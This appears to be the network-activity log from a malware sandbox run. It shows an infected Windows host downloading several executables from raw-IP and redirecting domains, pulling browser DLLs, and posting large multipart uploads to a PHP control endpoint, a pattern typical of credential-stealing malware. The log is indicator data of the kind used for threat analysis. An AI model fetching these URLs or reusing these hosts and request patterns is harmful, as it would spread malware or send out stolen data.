Last-Modified: Thu, 09 Nov 2023 18:10:51 GMT
Connection: keep-alive
ETag: "654d20ab-68a00"
Accept-Ranges: bytes
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.19:80RequestPOST /ghsdh39s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.172.128.19
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.172.128.59:80RequestGET /ISetup8.exe HTTP/1.1
Host: 185.172.128.59
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "60a01-6183a38e03b88"
Accept-Ranges: bytes
Content-Length: 395777
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request59.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request90.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.87.157.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request45.87.157.20.in-addr.arpaIN PTR
-
Remote address:185.172.128.90:80RequestGET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.0 500 Internal Server Error
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.228:80RequestGET /ping.php?substr=eight HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.59:80RequestGET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "3b800-6183a38de5727"
Accept-Ranges: bytes
Content-Length: 243712
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request228.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestsvc.iolo.comIN AResponsesvc.iolo.comIN A20.157.87.45
-
Remote address:8.8.8.8:53Request150.128.172.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A104.20.3.235pastebin.comIN A172.67.19.24pastebin.comIN A104.20.4.235
-
Remote address:8.8.8.8:53Request235.3.20.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestonlycitylink.comIN AResponseonlycitylink.comIN A104.21.18.166onlycitylink.comIN A172.67.182.192
-
Remote address:8.8.8.8:53Requestjonathantwo.comIN AResponsejonathantwo.comIN A104.21.31.124jonathantwo.comIN A172.67.176.131
-
Remote address:8.8.8.8:53Request166.18.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request86.2.147.190.in-addr.arpaIN PTRResponse86.2.147.190.in-addr.arpaIN PTRstatic-ip-cr190147286cablenetco
-
Remote address:8.8.8.8:53Requestipinfo.ioIN AResponseipinfo.ioIN A34.117.186.192
-
Remote address:8.8.8.8:53Request192.186.117.34.in-addr.arpaIN PTRResponse192.186.117.34.in-addr.arpaIN PTR19218611734bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Requestwestus2-2.in.applicationinsights.azure.comIN AResponsewestus2-2.in.applicationinsights.azure.comIN CNAMEwestus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.monitor.azure.comIN CNAMEwestus2-2.in.ai.privatelink.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comIN CNAMEgig-ai-prod-westus2-0.trafficmanager.netgig-ai-prod-westus2-0.trafficmanager.netIN CNAMEgig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.comgig-ai-prod-wus2-0-app-v4-tag.westus2.cloudapp.azure.comIN A20.9.155.145
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.227.13
-
Remote address:8.8.8.8:53Request45707d7f-925a-4cab-937b-d86c5ca14e6d.uuid.realupdate.ruIN TXTResponse
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.135.233
-
Remote address:8.8.8.8:53Request129.250.125.74.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request96.216.82.185.in-addr.arpaIN PTRResponse96.216.82.185.in-addr.arpaIN PTRdedic-mariadebommarez-1201693hosted-by-itldccom
-
Remote address:8.8.8.8:53Request121.150.80.3.in-addr.arpaIN PTRResponse121.150.80.3.in-addr.arpaIN PTRec2-3-80-150-121 compute-1 amazonawscom
-
Remote address:8.8.8.8:53Request99.56.20.217.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.googleapis.comIN AResponsewww.googleapis.comIN A142.250.187.202www.googleapis.comIN A142.250.187.234www.googleapis.comIN A142.250.178.10www.googleapis.comIN A172.217.16.234www.googleapis.comIN A142.250.200.10www.googleapis.comIN A142.250.200.42www.googleapis.comIN A216.58.201.106www.googleapis.comIN A216.58.204.74www.googleapis.comIN A172.217.169.10www.googleapis.comIN A172.217.169.42www.googleapis.comIN A142.250.179.234www.googleapis.comIN A142.250.180.10
-
Remote address:8.8.8.8:53Request202.187.250.142.in-addr.arpaIN PTRResponse202.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f101e100net
-
Remote address:8.8.8.8:53Requestapi2.check-data.xyzIN AResponseapi2.check-data.xyzIN CNAMEcheckdata-1114476139.us-west-2.elb.amazonaws.comcheckdata-1114476139.us-west-2.elb.amazonaws.comIN A35.82.94.151checkdata-1114476139.us-west-2.elb.amazonaws.comIN A44.237.26.169
-
Remote address:185.172.128.228:80RequestGET /BroomSetup.exe HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
ETag: "4a4030-613b1bf118700"
Accept-Ranges: bytes
Content-Length: 4866096
Content-Type: application/x-msdos-program
-
Remote address:20.157.87.45:80RequestPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
Connection: keep-alive
Content-Length: 300
Host: svc.iolo.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 200 OK
content-length: 256
content-type: text/html; charset=utf-8
x-whom: Ioloweb5
date: Sun, 12 May 2024 04:41:08 GMT
set-cookie: SERVERID=svc5; path=/
connection: close
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
Host: 185.172.128.150
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 156
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKEGDAKEHJDHIDHJJDAE
Host: 185.172.128.150
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 5416
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH
Host: 185.172.128.150
Content-Length: 4819
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/sqlite3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJ
Host: 185.172.128.150
Content-Length: 359
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/freebl3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/mozglue.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/msvcp140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/nss3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/softokn3.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestGET /b7d0cfdb1d966bdd/vcruntime140.dll HTTP/1.1
Host: 185.172.128.150
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDB
Host: 185.172.128.150
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHC
Host: 185.172.128.150
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIIEBAAFBFBAKFIDBAFH
Host: 185.172.128.150
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
Host: 185.172.128.150
Content-Length: 580923
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
Host: 185.172.128.150
Content-Length: 15735
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG
Host: 185.172.128.150
Content-Length: 302743
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBA
Host: 185.172.128.150
Content-Length: 15731
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK
Host: 185.172.128.150
Content-Length: 102207
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:185.172.128.150:80RequestPOST /c698e1bc8a2f5e6d.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KECBKKEBKEBFCAAAEGDH
Host: 185.172.128.150
Content-Length: 270
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address:8.8.8.8:53Requestyip.suIN AResponseyip.suIN A104.21.79.77yip.suIN A172.67.169.89
-
Remote address:8.8.8.8:53Request77.79.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestrealdeepai.orgIN AResponserealdeepai.orgIN A172.67.193.79realdeepai.orgIN A104.21.90.14
-
Remote address:8.8.8.8:53Requestfirstfirecar.comIN AResponsefirstfirecar.comIN A104.21.60.76firstfirecar.comIN A172.67.193.220
-
Remote address:8.8.8.8:53Request79.193.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request76.60.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.myip.comIN AResponseapi.myip.comIN A104.26.8.59api.myip.comIN A104.26.9.59api.myip.comIN A172.67.75.163
-
Remote address:8.8.8.8:53Requestdownload.iolo.netIN AResponsedownload.iolo.netIN CNAMEiolo0.b-cdn.netiolo0.b-cdn.netIN A143.244.56.51
-
Remote address:8.8.8.8:53Request51.56.244.143.in-addr.arpaIN PTRResponse51.56.244.143.in-addr.arpaIN PTR143-244-56-51 bunnyinfranet
-
Remote address:8.8.8.8:53Request51.56.244.143.in-addr.arpaIN PTR
-
Remote address:104.20.3.235:443RequestGET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 12 May 2024 03:22:28 GMT
Server: cloudflare
CF-RAY: 8827bc1fbe7f79c1-LHR
-
Remote address:104.21.79.77:443RequestGET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Sun, 12 May 2024 04:41:10 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 12 May 2024 04:28:28 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9GTNqwZrfH956H96gE32mXHQhNWcVuXYrp5DLPfJj%2BXCW5Ej7kHS3%2FcGPv1qeGbQ5lp5XoCTLkjkFvNffk9y9yoqFUQ3BGSkhmWFzAdcrwMLUDYhNM3T%2BK4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc1fbcdb779a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:5.42.96.64:80RequestGET /server/ww12/AppGate2103v01.exe HTTP/1.1
Host: 5.42.96.64
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Sun, 12 May 2024 04:41:10 GMT
Content-Type: application/octet-stream
Content-Length: 1449760
Last-Modified: Fri, 10 May 2024 14:30:10 GMT
Connection: keep-alive
ETag: "663e2f72-161f20"
Accept-Ranges: bytes
-
Remote address:5.42.96.78:80RequestGET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address:185.172.128.59:80RequestGET /ISetup5.exe HTTP/1.1
Host: 185.172.128.59
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Sun, 12 May 2024 04:30:01 GMT
ETag: "60a01-6183a38e01c48"
Accept-Ranges: bytes
Content-Length: 395777
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request1xst.ruIN AResponse1xst.ruIN A190.147.2.861xst.ruIN A181.129.118.1401xst.ruIN A58.151.148.901xst.ruIN A77.31.175.1831xst.ruIN A116.58.10.591xst.ruIN A105.158.113.671xst.ruIN A92.36.226.661xst.ruIN A186.145.236.931xst.ruIN A190.12.87.611xst.ruIN A187.143.62.35
-
Remote address:8.8.8.8:53Request64.96.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request124.31.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request26.56.192.85.in-addr.arpaIN PTRResponse26.56.192.85.in-addr.arpaIN PTRsomber-healthaezanetwork
-
Remote address:8.8.8.8:53Request59.8.26.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestsvc.iolo.comIN AResponsesvc.iolo.comIN A20.157.87.45
-
Remote address:8.8.8.8:53Request145.155.9.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.227.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestserver15.realupdate.ruIN AResponseserver15.realupdate.ruIN A185.82.216.96
-
Remote address:8.8.8.8:53Request233.130.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestservice-domain.xyzIN AResponseservice-domain.xyzIN A3.80.150.121
-
Remote address:8.8.8.8:53Requestx1.c.lencr.orgIN AResponsex1.c.lencr.orgIN CNAMEcrl.root-x1.letsencrypt.org.edgekey.netcrl.root-x1.letsencrypt.org.edgekey.netIN CNAMEe8652.dscx.akamaiedge.nete8652.dscx.akamaiedge.netIN A23.55.97.11
-
Remote address:8.8.8.8:53Request11.97.55.23.in-addr.arpaIN PTRResponse11.97.55.23.in-addr.arpaIN PTRa23-55-97-11deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestocsp.pki.googIN AResponseocsp.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.187.195
-
Remote address:8.8.8.8:53Request195.187.250.142.in-addr.arpaIN PTRResponse195.187.250.142.in-addr.arpaIN PTRlhr25s33-in-f31e100net
-
Remote address:8.8.8.8:53Request66.112.168.52.in-addr.arpaIN PTRResponse
-
Remote address:5.42.96.78:80RequestGET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address:104.21.18.166:443RequestGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pjk3Dq5d4vmsDGtKcIEHXcanz2P%2FOZiyxziMlyfse9pqV%2BWeZ%2FyguxaJZZF41OssKfFXAVX5qXbKjWwxo1cVGI%2BCgT%2F7JqpHjHhI3nbFkUvGfymU1MkmaqIumPVdINKDx8%2BW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc22586a6408-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.193.79:443RequestGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYbkfosYN6eDPM1KHNUQSuNBMrjnMgIN7622uwkxju6QSqZdokFGj2Or5sQ1QHpYuQA4EpanGSU75bg5qU8P%2FNAR10lvqRUIkJdGYYSKHoMrG7LAKR%2BnfNszgGMW%2FXq2DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2258b1949d-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.18.166:443RequestGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T57xCdjvJtjfuZLsuVI%2FxF02e0OKPlx%2F6WR3Alg%2B1ZNiYohfuIWE54jNZMWkrPKLzKXJzL1IVlHzI3P0DuxXNRQh42bP%2BUWGuzjj1zw0D6vHfRnYegbZ67hbiQlT%2BBM6iHZU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc225fbf63ea-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.193.79:443RequestGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive
ResponseHTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbLnMX2ZMRJTL8jxy8LI0HX5P8VNmPXi%2FONKTtsTah7MET09%2BNAzvCSiLElt1R%2Bj8kjsalVKQ6RHGkOfSeI1XbGgXA9ISJhOXhxYqlQKUyr%2F0XjFU7bBZfh79mzWrEKfIw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2258794922-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exeinstallutil.exeRemote address:104.21.31.124:443RequestGET /21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323208
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 845
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GFqNTPhfBOCwjBJydX2o4yiYNeLpb5eJtMy33XAOd10EdSfIx3GVxEItbH2vzANZ5dkyUNGrFvNTwOVvc0msRsXfH7AJxXPhCSOXH2B7fbQdcjZ0HQrOHQFR97g8S75FG4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc242adadcb7-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://jonathantwo.com/21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exeinstallutil.exeRemote address:104.21.31.124:443RequestGET /21dfe1441e91990f0eca04b138ef21be/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323208
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 850
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ljoVRyN7xA23q6BwBE%2FomjZmRlT4zfCQXBUd4Xpn1MMDqdm5dj88C0XDiVvP0iYwgE5nlA%2F2SNmMo7K11JuErVIrPOgJnHTACh01ad52MMB838PsMczEXdKe4GZeSY%2FH14%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8827bc2429647309-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://firstfirecar.com/21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exeinstallutil.exeRemote address:104.21.60.76:443RequestGET /21dfe1441e91990f0eca04b138ef21be/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/x-ms-dos-executable
Content-Length: 4323192
Connection: keep-alive
Last-Modified: Sun, 12 May 2024 00:31:42 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 992
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OMz1kYvriUpj%2F%2B30HeCQuzuaJLfmyhesn8HgWgDCmtsXrIIzKLad1UO71Ef9hNrEgdhMD58pd%2BsaZUbWCvAnuD%2BWF8w7u5uWDMMbLakf3qpv4%2BTwTcFrV8r7T%2BTAIIKbmpVA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
